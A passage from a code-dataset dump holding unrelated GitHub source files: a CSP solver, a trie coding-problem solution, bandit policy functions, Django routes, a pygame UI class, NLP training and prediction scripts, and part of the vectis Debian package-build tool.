letters[cons[0]]\n right_index = letters[cons[2]]\n op = cons[1]\n constraints[left_key][right_index] = op\n if op == \"<\":\n constraints[right_key][left_index] = \">\"\n elif op == \">\":\n constraints[right_key][left_index] = \"<\"\n else:\n constraints[right_key][left_index] = op\n else: \n print(\"Constraint file contains variable names that are not in the variable file. Please make sure you are inputing the correct and matching paths.\")\n exit()\n else:\n print(\"Please provide a .con file that exists. Make sure you are not just providing a directory.\")\n exit()\n\n # Counting number of constraints for each letter\n num_con = {}\n for key, list in constraints.items():\n num_con[key] = len(list) - list.count(0)\n \n # Creating dictionaries for domains, constraints and num of constraints. Letters array will hold the keys for each.\n\n # Init Search Algorithms\n solver = sa(letters, domains, constraints, num_con)\n\n # Getting enforcement setting from command line\n if args.consistency_enforcing == \"none\": solver.backtracking() # Call backtracking solver\n elif args.consistency_enforcing == \"fc\": solver.forward_checking() # Call forward checking solver\n else:\n print(\"Please provide an option for the consistency enforcement. The choices are none and fc.\")\n exit()\n\n \n\n \n \n \n\nif __name__ == '__main__':\n main()\n","repo_name":"codeCollision4/constraint-satisfaction-problem-solver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41628956438","text":"#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\n# } Driver Code Ends\n#User function Template for python3\nfrom typing import List\nclass Node:\n def __init__(self):\n self.child = [None] * 26\n\ndef insert(s, root):\n for i in range(len(s)):\n if root.child[ord(s[i]) - ord('a')]:\n root = root.child[ord(s[i]) - ord('a')]\n else:\n root.child[ord(s[i]) - ord('a')] = Node()\n root = root.child[ord(s[i]) - ord('a')]\n\ndef find(root, s):\n for i in range(len(s)):\n if root.child[ord(s[i]) - ord('a')]:\n root = root.child[ord(s[i]) - ord('a')]\n else:\n return False\n return True\n\nclass Solution:\n def prefixSuffixString(self, s1: List[str], s2: List[str]) -> int:\n t1, t2 = Node(), Node()\n for it in s1:\n insert(it, t1)\n insert(it[::-1], t2)\n \n cnt = 0\n for it in s2:\n ok = False\n if find(t1, it) or find(t2, it[::-1]):\n cnt += 1\n return cnt\n\n\n\n\n#{ \n # Driver Code Starts.\n\nif __name__==\"__main__\":\n for _ in range(int(input())):\n s1 = list(map(str, input().split()))\n s2 = list(map(str, input().split()))\n obj=Solution()\n print(obj.prefixSuffixString(s1, s2))\n# } Driver Code Ends","repo_name":"akashprap/Coding-Problems","sub_path":"Medium/Prefix Suffix String/prefix-suffix-string.py","file_name":"prefix-suffix-string.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19054062180","text":"import math\nimport numpy as np\nimport random\n\n\ndef python_sigmoid(number):\n return 1 / (1 + math.exp(-number))\n\n\ndef beta_scale(j, N):\n foo = N - 2\n return python_sigmoid(10 * ((2 * j - foo) / foo))\n\n\ndef tf_beta_scale(j, N):\n import tensorflow as tf\n foo = N - 2\n return tf.nn.sigmoid(10 * ((2 * j - foo) / foo))\n\n\ndef gamma_sigmoid(j, k, gamma_0, gamma_1):\n return gamma_1 + (gamma_0 - gamma_1) * (1 - python_sigmoid(10 * ((2 * j - k) / k)))\n\n\ndef tf_gamma_sigmoid(j, k, gamma_0, gamma_1):\n import tensorflow as tf\n return gamma_1 + (gamma_0 - gamma_1) * (1 - tf.nn.sigmoid(10 * ((2 * j - k) / k)))\n\n\ndef gamma_decay(j, N, gamma_1, gamma_2):\n scale = (j - 8) / (N - 9)\n return 1 - math.exp((1 - scale) * math.log(1 - gamma_1) + scale * math.log(1 - gamma_2))\n\n\ndef tf_gamma_decay(j, N, gamma_1, gamma_2):\n import tensorflow as tf\n scale = (j - 8) / (N - 9)\n return 1 - tf.math.exp((1 - scale) * tf.math.log(1 - gamma_1) + scale * tf.math.log(1 - gamma_2))\n\n\ndef get_policy(j, N, max_beta=.3, gamma_0=.9999, gamma_1=0.997, gamma_2=.99):\n if j == 0:\n beta = 0.\n gamma = gamma_0\n elif j >= N - 1:\n beta = max_beta\n gamma = gamma_decay(j, N, gamma_1, gamma_2)\n else:\n beta = max_beta * beta_scale(j, N)\n if j < 7:\n gamma = gamma_sigmoid(j, 6, gamma_0, gamma_1)\n elif j == 7:\n gamma = gamma_1\n else:\n gamma = gamma_decay(j, N, gamma_1, gamma_2)\n return beta, gamma\n\n\ndef tf_get_policy(j, N, dtype, max_beta=.3, gamma_0=.9999, gamma_1=0.997, gamma_2=.99):\n import tensorflow as tf\n max_beta = tf.convert_to_tensor(max_beta, dtype)\n gamma_0 = tf.convert_to_tensor(gamma_0, dtype)\n gamma_1 = tf.convert_to_tensor(gamma_1, dtype)\n gamma_2 = tf.convert_to_tensor(gamma_2, dtype)\n beta = max_beta * tf_beta_scale(j, N)\n beta = tf.where(j >= N - 1., tf.cast(tf.fill(j.shape, max_beta), dtype), beta)\n beta = tf.where(j == 0., tf.zeros_like(beta), beta)\n gamma = tf_gamma_decay(j, N, gamma_1, gamma_2)\n gamma = tf.where(j == 7., tf.cast(tf.fill(j.shape, gamma_1), dtype), gamma)\n gamma = tf.where(j < 7., tf_gamma_sigmoid(j, 6., gamma_0, gamma_1), gamma)\n gamma = tf.where(j == 0., tf.cast(tf.fill(j.shape, gamma_0), dtype), gamma)\n return beta, gamma\n\n\nclass MAB:\n\n def __init__(self, N, epsilon, beta, window_size):\n self.N = N\n self.epsilon = epsilon\n self.beta = beta\n self.window_size = window_size\n self.rewards = np.zeros(N)\n self.counts = np.zeros(N)\n self.window = []\n self.k = 0\n\n def save(self, root, print_exception=False):\n print(\"Saving\")\n try:\n import json\n import os\n os.makedirs(root, exist_ok=True)\n with open(root + \"mab.json\", 'w') as file:\n json.dump({\"mab\": self.window, \"k\": self.k}, file)\n return True\n except Exception as e:\n if print_exception:\n print(e)\n return False\n\n def load(self, root):\n import json\n import os\n if os.path.isfile(root + \"mab.json\"):\n with open(root + \"mab.json\", 'r') as file:\n data = json.load(file)\n self.window = data['mab']\n self.k = data['k']\n for elm in self.window:\n arm, reward = elm\n self.counts[arm] += 1\n self.rewards[arm] += reward\n return True\n return False\n\n def greed(self):\n den = self.counts + 1e-10\n ranks = np.divide(self.rewards, den)\n self.k -= 1\n return int(np.argmax(ranks))\n\n def ucb(self):\n num = math.log(min(self.k - 1, self.window_size))\n den = self.counts + 1e-10\n ucb = self.beta * np.sqrt(np.divide(num, den))\n ranks = ucb + np.divide(self.rewards, den)\n return int(np.argmax(ranks))\n\n def get_j(self):\n if self.k < self.N:\n return self.k\n if random.random() < self.epsilon:\n return random.randint(0, self.N - 1)\n return self.ucb()\n\n def update_reward(self, arm, reward):\n self.counts[arm] += 1\n self.rewards[arm] += reward\n self.window.append((arm, reward))\n self.k += 1\n if len(self.window) > self.window_size:\n arm, reward = self.window.pop(0)\n self.counts[arm] -= 1\n self.rewards[arm] -= reward\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n\n N = 32\n betas = []\n gammas = []\n indicies = []\n for j in range(N):\n indicies.append(j)\n b, g = get_policy(j, N)\n betas.append(b)\n gammas.append(g)\n plt.plot(indicies, betas, 'bs')\n plt.show()\n plt.plot(indicies, gammas, 'bs')\n plt.show()\n print(gammas)\n","repo_name":"Bjacobwork/AnotherAgent57","sub_path":"bandit/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38196922693","text":"\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('terminals/new', views.terminals_new),\n path('terminals//edit', views.terminals_edit),\n path('terminals/', views.terminals_page),\n path('terminals', views.terminals_all),\n path('states/', views.states_page),\n path('states', views.states_all),\n path('about', views.about_page),\n path('chatbot', views.chatbot_page),\n]\n","repo_name":"thedejijoseph/travelinfo-app","sub_path":"browser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3761261541","text":"import pygame\nclass Chooser():\n \"\"\" 选择面板初始化\"\"\"\n def __init__(self,screen):\n #加载图片以及设定位置\n self.screen = screen\n self.image = pygame.image.load('resource\\Cards\\ChooserBackground.png')\n self.screen_rect = self.screen.get_rect()\n self.rect = self.image.get_rect()\n\n self.rect.left = self.screen_rect.left\n self.rect.top = self.screen_rect.top\n\n ###选择的项目\n self.card_cherrybomb_image = pygame.image.load('resource\\Cards\\card_cherrybomb.png')\n self.card_snowpea_image = pygame.image.load('resource\\Cards\\card_snowpea.png')\n self.card_threepeashooter_image = pygame.image.load('resource\\Cards\\card_threepeashooter.png')\n\n self.card_cherrybomb_rect = self.card_cherrybomb_image.get_rect()\n self.card_snowpea_image_rect = self.card_snowpea_image.get_rect()\n self.card_threepeashooter_image_rect = self.card_threepeashooter_image.get_rect()\n \n def blitchooser(self):\n \"\"\" 绘制选择面板\"\"\"\n self.screen.blit(self.image,self.rect)\n\n def blitchooser_items(self):\n \"\"\" 绘制选择的选项\"\"\"\n \n\n\n\n self.card_cherrybomb_rect.left = self.screen_rect.left + 75 \n self.card_cherrybomb_rect.top = self.screen_rect.top\n\n self.card_snowpea_image_rect.left = self.card_cherrybomb_rect.left + self.card_snowpea_image_rect.width\n self.card_snowpea_image_rect.top = self.screen_rect.top\n\n self.card_threepeashooter_image_rect.left = self.card_snowpea_image_rect.left + self.card_threepeashooter_image_rect.width\n self.card_threepeashooter_image_rect.top = self.screen_rect.top\n\n \n\n\n\n self.screen.blit(self.card_cherrybomb_image,self.card_cherrybomb_rect)\n self.screen.blit(self.card_snowpea_image,self.card_snowpea_image_rect)\n self.screen.blit(self.card_threepeashooter_image,self.card_threepeashooter_image_rect)\n ","repo_name":"linxinloningg/PygameThunderfighter","sub_path":"chooser.py","file_name":"chooser.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2668067061","text":"import os\nimport myutils\n\nUDWORDS = {}\nEMPTIES = set()\nfor udPath in ['data/ud-treebanks-v' + myutils.UDversion + '.noEUD/', 'data/ud-treebanks-v2.extras.noEUD/']:\n for UDdir in os.listdir(udPath):\n if not (os.path.isdir(udPath + UDdir) and UDdir.startswith('UD')):\n continue\n train, dev, test = myutils.getTrainDevTest(udPath + UDdir)\n if not myutils.hasColumn(test, 1):\n #print('NOWORDS', test)\n continue\n if train == '':\n EMPTIES.add(udPath + UDdir)\n else:\n words = myutils.getWords(train)\n UDWORDS[udPath + UDdir] = set(words)\n\nPROXIES = {}\nfor UDdir in EMPTIES: \n _, _, test = myutils.getTrainDevTest(UDdir)\n testWords = myutils.getWords(test, 10)\n scores = {}\n for proxy in UDWORDS:\n scores[proxy] = myutils.getOverlap(testWords, UDWORDS[proxy])\n PROXIES[UDdir] = sorted(scores, key=scores.get, reverse=True)[0]\n\ndef pred(model,test, output, datasetID):\n evalFile = output + '.eval'\n isEmpty = (not os.path.isfile(output)) or (os.path.isfile(output) and os.stat(output).st_size == 0)\n #print(output, isEmpty, model!= '')\n if model != '' and isEmpty:\n cmd = ' '.join(['python3 predict.py', model, test, output, '--dataset ' + datasetID])\n print(cmd)\n\noutDir = 'preds' + myutils.UDversion + '/'\nif not os.path.isdir(outDir):\n os.mkdir(outDir)\n\nfor UDdir in list(UDWORDS) + list(EMPTIES):\n for seed in myutils.seeds:\n train, dev, test = myutils.getTrainDevTest(UDdir)\n \n datasetName = UDdir.split('/')[-1]\n datasetID = UDdir if train != '' else PROXIES[UDdir]\n datasetID = datasetID.split('/')[-1]\n\n for config in ['concat', 'concat.smoothed', 'sepDec.smoothed', 'datasetEmbeds.smoothed']:\n name = 'fullUD' + config + '.' + str(seed)\n model = myutils.getModel(name)\n output = outDir + name + '.' + datasetName + '.test.' + seed + '.conllu'\n pred(model, test, output, datasetID)\n\n model = myutils.getModel(datasetID + '.' + str(seed))\n output = outDir + 'self.' + datasetName + '.test.' + seed + '.conllu'\n pred(model, test, output, datasetID)\n\n\n","repo_name":"AngelFelipeMP/MultiTask-Learning-for-Toxic-Language-Classification","sub_path":"machamp/scripts/2.ud.pred.py","file_name":"2.ud.pred.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22643649357","text":"from resources.game_rule import games\nimport random\n\nclass LuckyNumbers():\n def __init__(self, game_num):\n # Defining the needed variables.\n self.game_num = game_num \n self.total_pick = int(games[self.game_num][\"Max_pick\"]) # This is the total number needs by the user which is currently 6.\n self.max_number = int(games[self.game_num][\"Max_number\"]) # This is the max number that can be chosen randomly.\n \n def generate_number(self):\n temp_numbers = [] # This will hold the randomly generated numbers.\n \n # This will add the generated numbers.\n while len(temp_numbers) < (self.total_pick):\n temp_numbers.append(random.randint(1, self.max_number))\n\n return temp_numbers","repo_name":"Pikasu12/lotto_number_generator","sub_path":"LuckyNumber.py","file_name":"LuckyNumber.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73690147048","text":"import torch\nimport torch.nn as nn\nfrom model import GreaseArgConfig, GreaseArgModel, GreaseArgPreTrainedModel\nfrom torch import Tensor\nfrom torch_geometric.data import Batch, Data\nfrom transformers.modeling_outputs import SequenceClassifierOutput\n\n\nclass GreaseArgClassificationTransform(nn.Module):\n def __init__(self, config: GreaseArgConfig) -> None:\n super().__init__()\n self.config = config\n input_size: int = 0\n\n if config.input_text:\n input_size += config.hidden_size\n if config.input_graph:\n input_size += config.gnn_hidden_size << 1\n\n self.dense = nn.Linear(input_size, config.hidden_size)\n self.tanh = nn.Tanh()\n self.output = nn.Linear(config.hidden_size, config.num_labels)\n\n self.dropout = nn.Dropout(\n config.classifier_dropout if config.classifier_dropout else config.hidden_dropout_prob\n )\n\n def forward(\n self, lm_x: Tensor | None = None, gnn_x: Tensor | None = None, ptr: Tensor | None = None\n ) -> Tensor:\n inputs = []\n if self.config.input_text:\n inputs.append(lm_x[:, 0])\n\n if self.config.input_graph:\n gin: list[Tensor] = []\n\n for i, j in zip(ptr[:-1], ptr[1:]):\n cur_gnn_x: Tensor = gnn_x[i:j, :]\n gin.append(cur_gnn_x[j - i - 2 :, :].view(1, -1))\n\n inputs.append(torch.cat(gin))\n\n x = torch.cat(inputs, dim=1)\n x = self.dense(x)\n x = self.tanh(x)\n x = self.dropout(x)\n x = self.output(x)\n return x\n\n\nclass GreaseArgModelForClassification(GreaseArgPreTrainedModel):\n def __init__(self, config: GreaseArgConfig):\n super().__init__(config)\n self.config = config\n\n self.grease_arg = GreaseArgModel(config)\n self.transform = GreaseArgClassificationTransform(config)\n self.loss = nn.CrossEntropyLoss()\n\n self.post_init()\n\n def forward(\n self,\n input_ids: Tensor | None = None,\n attention_mask: Tensor | None = None,\n graphs: list[Data] | None = None,\n mark: Tensor | None = None,\n labels: Tensor | None = None,\n ):\n if self.config.input_graph:\n graphs = Batch.from_data_list([graphs[i] for i in mark])\n\n lm_x, gnn_x = self.grease_arg(input_ids, attention_mask, graphs)\n\n logits = self.transform(lm_x, gnn_x, graphs.ptr if self.config.input_graph else None).view(\n -1, self.config.num_labels\n )\n\n loss = None if labels is None else self.loss(logits, labels)\n return SequenceClassifierOutput(loss=loss, logits=logits)\n","repo_name":"ljcleo/Hi-ArG","sub_path":"iam_cesc/finetune/model_finetune.py","file_name":"model_finetune.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30864173582","text":"#!/bin/python3\nimport math\n\n# Complete the squares function below.\ndef squares(a, b):\n\n# as naive brutal force approach to iterate through entire range and check if square root from every number is an integer leads to TLE\n\n# we can take left and right edges (a and b, respectively) \n\n# for right edge (b) take the square root and floor it down so we got the integer 'right_edge' which is in range ((sqrt(a), sqrt(b))\n# which means that square of this number is in range (a, b)\n\n# for left edge we ceil up sqrt(a) and get the integer 'left_edge' the same way\n\n# difference of these two integers results to a number of integers which lie in a range ((sqrt(a), sqrt(b))\n# therefore their squares definately lie in a range (a, b)\n\n left_edge = math.ceil(math.sqrt(a))\n right_edge = math.floor(math.sqrt(b))\n\n return (right_edge - left_edge + 1)\n \nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n ab = input().split()\n\n a = int(ab[0])\n\n b = int(ab[1])\n\n result = squares(a, b)\n\n print(result)\n\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n","repo_name":"iduseev/HACKERRANK-SOLUTIONS","sub_path":"algorithms/implementation/sherlock_and_squares/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12654242832","text":"from watchablemedia import WatchableMedia\n\n\nclass Movies(WatchableMedia):\n def __init__(self):\n super().__init__()\n self.video_type = None\n self.audio_type = None\n\n @classmethod\n def from_json(cls, data):\n instance = super().from_json(data)\n instance.video_type = data.get(\"video_type\")\n instance.audio_type = data.get(\"audio_type\")\n\n return instance\n","repo_name":"Datenlord1510/discord-predb","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"37350024509","text":"import glob\nimport logging\nimport os\nimport shlex\nimport shutil\nimport subprocess\nimport time\nfrom collections import (\n OrderedDict,\n)\nfrom contextlib import suppress\nfrom tempfile import TemporaryDirectory\n\ntry:\n import typing\nexcept ImportError:\n pass\nelse:\n from typing import (\n Iterable,\n List,\n Mapping,\n Optional,\n Sequence,\n Set,\n Tuple,\n )\n typing # silence pyflakes\n Iterable\n List\n Mapping\n Optional\n Sequence\n Set\n Tuple\n\nfrom debian.changelog import (\n Changelog,\n)\nfrom debian.deb822 import (\n Changes,\n Deb822,\n Dsc,\n)\nfrom debian.debian_support import (\n Version,\n)\n\nfrom vectis.apt import (\n AptSource,\n)\nfrom vectis.autopkgtest import (\n run_autopkgtest,\n)\nfrom vectis.config import (\n Suite,\n)\nfrom vectis.error import (\n ArgumentError,\n CannotHappen,\n)\nfrom vectis.piuparts import (\n Binary,\n run_piuparts,\n)\nfrom vectis.util import (\n AtomicWriter,\n)\nfrom vectis.worker import (\n ContainerWorker,\n SchrootWorker,\n VirtWorker,\n)\n\nimport vectis.config\nvectis.config # noqa\n\nlogger = logging.getLogger(__name__)\n\n\nclass PbuilderWorker(ContainerWorker):\n\n def __init__(\n self,\n *,\n architecture, # type: str\n mirrors, # type: vectis.config.Mirrors\n suite, # type: vectis.config.Suite\n worker, # type: VirtWorker\n chroot=None, # type: Optional[str]\n components=(), # type: Sequence[str]\n extra_repositories=(), # type: Sequence[str]\n storage=None, # type: str\n tarball=None, # type: str\n ):\n # type: (...) -> None\n super().__init__(mirrors=mirrors, suite=suite)\n\n if tarball is None:\n assert storage is not None\n\n tarball = os.path.join(\n storage, architecture, str(suite.hierarchy[-1].vendor),\n str(suite.hierarchy[-1]), 'pbuilder.tar.gz')\n\n self.apt_related_argv = [] # type: Sequence[str]\n self.components = components\n self.__dpkg_architecture = architecture # type: str\n self.extra_repositories = extra_repositories\n self.tarball = tarball\n self.tarball_in_guest = None # type: Optional[str]\n self.worker = worker\n\n # We currently assume that copy_to_guest() works\n assert isinstance(self.worker, VirtWorker)\n\n @property\n def dpkg_architecture(self):\n return self.__dpkg_architecture\n\n def _open(self):\n super()._open()\n self.set_up_apt()\n\n def set_up_apt(self):\n self.tarball_in_guest = self.worker.make_file_available(\n self.tarball, cache=True)\n\n argv = []\n\n for ancestor in self.suite.hierarchy:\n if self.components:\n filtered_components = (\n set(self.components) & set(ancestor.all_components))\n else:\n filtered_components = ancestor.components\n\n uri = self.mirrors.lookup_suite(ancestor)\n\n source = AptSource(\n components=filtered_components,\n suite=ancestor.apt_suite,\n type='deb',\n trusted=ancestor.apt_trusted,\n uri=uri,\n )\n\n if ancestor is self.suite.hierarchy[-1]:\n logger.info(\n '%r: %s => --distribution %s --mirror %s '\n '--components %r',\n self, ancestor, source.suite,\n source.uri, ' '.join(source.components))\n argv.append('--distribution')\n argv.append(source.suite)\n argv.append('--mirror')\n argv.append(source.uri)\n argv.append('--components')\n argv.append(' '.join(source.components))\n else:\n logger.info(\n '%r: %s => --othermirror %s', self, ancestor, source)\n argv.append('--othermirror')\n argv.append(str(source))\n\n for line in self.extra_repositories:\n argv.append('--othermirror')\n argv.append(line)\n\n self.apt_related_argv = argv\n self.install_apt_keys()\n\n def install_apt_key(self, apt_key):\n self.apt_related_argv.append('--keyring')\n self.apt_related_argv.append(\n self.worker.make_file_available(apt_key))\n\n\nclass Buildable:\n\n def __init__(\n self,\n buildable, # type: str\n *,\n binary_version_suffix='', # type: str\n link_builds=(), # type: Iterable[str]\n orig_dirs=('..',), # type: Iterable[str]\n output_dir=None, # type: Optional[str]\n output_parent, # type: str\n vendor, # type: vectis.config.Vendor\n ):\n # type: (...) -> None\n\n self.buildable = buildable\n\n self._product_prefix = None\n self._source_version = None # type: Optional[Version]\n self._binary_version = None\n self.arch_wildcards = set() # type: Set[str]\n self.archs = [] # type: List[str]\n self.autopkgtest_failures = [] # type: List[str]\n self.binary_packages = [] # type: List[str]\n self.binary_version_suffix = binary_version_suffix\n self.changes_produced = {} # type: Mapping[str, str]\n self.dirname = None\n self.dsc = None\n self.dsc_name = None\n self.indep = False\n self.indep_together_with = None\n self.link_builds = link_builds\n self.logs = {} # type: Mapping[str, str]\n self.merged_changes = OrderedDict() # type: Mapping[str, str]\n self.nominal_suite = None\n self.orig_dirs = orig_dirs\n self.output_dir = output_dir\n self.piuparts_failures = [] # type: List[str]\n self.source_from_archive = False\n self.source_package = None # type: Optional[str]\n self.source_together_with = None\n self.sourceful_changes_name = None\n self.suite = None\n self.vendor = vendor\n\n if os.path.exists(self.buildable):\n if os.path.isdir(self.buildable):\n path = os.path.join(self.buildable, 'debian', 'changelog')\n changelog = Changelog(open(path))\n self.source_package = changelog.get_package()\n self.nominal_suite = changelog.distributions\n self._source_version = Version(changelog.version)\n control = os.path.join(self.buildable, 'debian', 'control')\n\n if len(changelog.distributions.split()) != 1:\n raise ArgumentError(\n 'Cannot build for multiple distributions at once')\n\n for paragraph in Deb822.iter_paragraphs(open(control)):\n self.arch_wildcards |= set(\n paragraph.get('architecture', '').split())\n binary = paragraph.get('package')\n\n if binary is not None:\n self.binary_packages.append(binary)\n\n elif self.buildable.endswith('.changes'):\n self.dirname = os.path.dirname(self.buildable) or os.curdir\n self.sourceful_changes_name = self.buildable\n sourceful_changes = Changes(open(self.buildable))\n if 'source' not in sourceful_changes['architecture'].split():\n raise ArgumentError(\n 'Changes file {!r} must be sourceful'.format(\n self.buildable))\n\n self.nominal_suite = sourceful_changes['distribution']\n\n for f in sourceful_changes['files']:\n if f['name'].endswith('.dsc'):\n if self.dsc_name is not None:\n raise ArgumentError(\n 'Changes file {!r} contained more than one '\n '.dsc file'.format(self.buildable))\n\n self.dsc_name = os.path.join(self.dirname, f['name'])\n\n if self.dsc_name is None:\n raise ArgumentError(\n 'Changes file {!r} did not contain a .dsc file'.format(\n self.buildable))\n\n self.dsc = Dsc(open(self.dsc_name))\n\n elif self.buildable.endswith('.dsc'):\n self.dirname = os.path.dirname(self.buildable) or os.curdir\n self.dsc_name = self.buildable\n self.dsc = Dsc(open(self.dsc_name))\n\n else:\n raise ArgumentError(\n 'buildable must be .changes, .dsc or directory, not '\n '{!r}'.format(self.buildable))\n else:\n self.source_from_archive = True\n version = None # type: Optional[str]\n\n if '_' in self.buildable:\n source, version = self.buildable.split('_', 1)\n else:\n source = self.buildable\n\n self.source_package = source\n if version is not None:\n self._source_version = Version(version)\n\n if self.dsc is not None:\n self.source_package = self.dsc['source']\n self._source_version = Version(self.dsc['version'])\n self.arch_wildcards = set(self.dsc['architecture'].split())\n self.binary_packages = [p.strip()\n for p in self.dsc['binary'].split(',')]\n\n if self._source_version is not None:\n self._binary_version = Version(\n str(self._source_version) + self.binary_version_suffix)\n\n assert self.source_package is not None\n\n timestamp = time.strftime('%Y%m%dt%H%M%S', time.gmtime())\n\n if self.output_dir is None:\n if self._binary_version is None:\n dirname = '{}_{}'.format(self.source_package, timestamp)\n else:\n dirname = '{}_{}_{}'.format(\n self.source_package,\n self._binary_version,\n timestamp)\n\n self.output_dir = os.path.join(output_parent, dirname)\n\n # For convenience, create a symbolic link for the latest build of\n # each source package: hello_latest -> hello_2.10-1_20170319t102623\n\n unversioned_symlink = os.path.join(\n output_parent, self.source_package + '_latest')\n\n with suppress(FileNotFoundError):\n os.unlink(unversioned_symlink)\n\n os.symlink(dirname, unversioned_symlink)\n\n # If we know the version, also create a symbolic link for the\n # latest build of each source/version pair:\n # hello_2.10-1 -> hello_2.10-1_20170319t102623\n if self._binary_version is not None:\n versioned_symlink = os.path.join(\n output_parent,\n '{}_{}'.format(self.source_package, self._binary_version))\n\n with suppress(FileNotFoundError):\n os.unlink(versioned_symlink)\n\n os.symlink(dirname, versioned_symlink)\n\n # It's OK if the output directory exists but is empty.\n with suppress(FileNotFoundError):\n os.rmdir(self.output_dir)\n\n # Otherwise, if someone already created this, we'll just crash out.\n os.mkdir(self.output_dir)\n\n if self.dsc is not None:\n assert self.dsc_name is not None\n\n abs_file = os.path.abspath(self.dsc_name)\n abs_dir, base = os.path.split(abs_file)\n os.symlink(abs_file, os.path.join(self.output_dir, base))\n\n for l in self.link_builds:\n symlink = os.path.join(l, base)\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(abs_file, symlink)\n\n for f in self.dsc['files']:\n abs_file = os.path.join(abs_dir, f['name'])\n os.symlink(\n abs_file,\n os.path.join(self.output_dir, f['name']))\n\n for l in self.link_builds:\n symlink = os.path.join(l, f['name'])\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(abs_file, symlink)\n\n @property\n def product_prefix(self):\n if self._product_prefix is None:\n version_no_epoch = Version(self.binary_version)\n version_no_epoch.epoch = None\n self._product_prefix = '{}_{}'.format(\n self.source_package, version_no_epoch)\n\n return self._product_prefix\n\n @property\n def binary_version(self):\n return self._binary_version\n\n @property\n def source_version(self):\n return self._source_version\n\n @source_version.setter\n def source_version(self, v):\n self._source_version = v\n self._product_prefix = None\n self._binary_version = Version(\n str(self._source_version) + self.binary_version_suffix)\n\n def copy_source_to(self, worker):\n worker.check_call([\n 'mkdir', '-p', '-m755', '{}/in'.format(worker.scratch)])\n\n if self.dsc_name is not None:\n assert self.dsc is not None\n\n worker.copy_to_guest(\n self.dsc_name,\n '{}/in/{}'.format(\n worker.scratch,\n os.path.basename(self.dsc_name)))\n\n for f in self.dsc['files']:\n worker.copy_to_guest(\n os.path.join(self.dirname, f['name']),\n '{}/in/{}'.format(worker.scratch, f['name']))\n elif not self.source_from_archive:\n worker.copy_to_guest(\n os.path.join(self.buildable, ''),\n '{}/in/{}_source/'.format(\n worker.scratch,\n self.product_prefix))\n worker.check_call([\n 'chown', '-R', 'sbuild:sbuild',\n '{}/in/'.format(worker.scratch)])\n if self._source_version.debian_revision is not None:\n worker.check_call([\n 'install', '-d', '-m755', '-osbuild', '-gsbuild',\n '{}/out'.format(worker.scratch)])\n\n origs_copied = set()\n\n for orig_dir in self.orig_dirs:\n orig_glob_prefix = glob.escape(\n os.path.join(\n self.buildable, orig_dir,\n '{}_{}'.format(\n self.source_package,\n self._source_version.upstream_version)))\n\n for orig_pattern in (\n orig_glob_prefix + '.orig.tar.*',\n orig_glob_prefix + '.orig-*.tar.*'):\n logger.info(\n 'Looking for original tarballs: %s', orig_pattern)\n\n for orig in glob.glob(orig_pattern):\n base = os.path.basename(orig)\n\n if base in origs_copied:\n logger.info(\n 'Already copied %s; ignoring %s', base,\n orig)\n continue\n\n origs_copied.add(base)\n logger.info('Copying original tarball: %s', orig)\n worker.copy_to_guest(\n orig, '{}/in/{}'.format(\n worker.scratch, base))\n worker.check_call([\n 'ln', '-s',\n '{}/in/{}'.format(worker.scratch, base),\n '{}/out/{}'.format(worker.scratch, base),\n ])\n\n def get_source_from_archive(\n self,\n worker, # type: VirtWorker\n chroot, # type: SchrootWorker\n ):\n # We fetch the source ourselves rather than letting sbuild do\n # it, because for source rebuilds we need the orig.tar.* even\n # if it's revision 2 or later, so that we can run lintian on\n # the host system. If we let sbuild run lintian then it would\n # be an outdated version.\n worker.check_call([\n 'mkdir', '/var/lib/sbuild/build/{}'.format(self),\n ])\n worker.check_call([\n 'mkdir', '-p', '-m755', '{}/in'.format(worker.scratch)])\n\n if self.source_version is None:\n chroot.check_call([\n 'sh',\n '-euc',\n 'cd /build/\"$1\"; shift; exec \"$@\"',\n 'sh', # argv[0]\n str(self),\n 'apt-get', '-o=APT::Get::Only-Source=true',\n 'source', self.source_package,\n ])\n else:\n chroot.check_call([\n 'sh',\n '-euc',\n 'cd /build/\"$1\"; shift; exec \"$@\"',\n 'sh', # argv[0]\n str(self),\n 'apt-get', '-o=APT::Get::Only-Source=true',\n 'source',\n '{}={}'.format(\n self.source_package,\n self.source_version,\n )\n ])\n\n dscs = worker.check_output([\n 'sh',\n '-euc',\n 'exec ls /var/lib/sbuild/build/\"$1\"/*.dsc',\n 'sh', # argv[0]\n str(self),\n ], universal_newlines=True)\n\n dscs = dscs.splitlines()\n\n if len(dscs) != 1:\n raise CannotHappen(\n 'apt-get source produced more than one '\n '.dsc file from 